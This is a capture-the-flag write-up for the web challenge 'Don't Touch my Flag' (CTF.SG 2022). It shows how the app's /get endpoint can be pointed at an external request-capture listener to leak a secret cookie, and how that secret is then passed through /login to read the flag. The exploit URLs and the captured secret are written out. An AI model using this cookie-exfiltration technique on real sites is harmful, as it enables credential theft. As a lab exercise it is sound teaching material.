Don’t Touch my Flag (CTF.SG 2022)

challenge description

Understanding how the website works

Get Function

Firstly, from the index function, we see that it calls /get. Looking at the get function, we see that it sends a request to the url, with the secret as a cookie. Keep this in mind as we’ll need to make use of the secret to get the flag. Lastly, it censors the response by converting everything into *.

get censor

Flag Function

We see that the webpage uses the get function to get \flag, so that’s probably the best function to look into next.

get flag

Seems like all it does is it reveals the flag if secret is correct.

Based on these information, we could certainly get the value of secret and write a script to send it as a cookie. However, the \login function does that for us :O

Login Function


We see that the login function will redirect us to the next webpage with secret as a cookie parameter if secret as a argument passed in is correct.

Steps to Solve

  1. Get the value of secret.
  2. Use the login function to send a request to flag (/login?next=/flag&secret=secret).
  3. Done

Getting Secret

As the get function sends a request with secret as a cookie, we can set up a listener on an external website, which is used to see the values of the request sent.

I went to to set up a listener, and made a GET request through /get?uri={requestbin_link_here}. Viola, we got the secret!


Using Login to get Flag

Now, we just need to use login to send a request to flag, simply by doing /login?next=/flag&secret=8byEt7F60cCSRpQs1jeAXQqByOsK5P5b. Ez claps, we got the flag :D


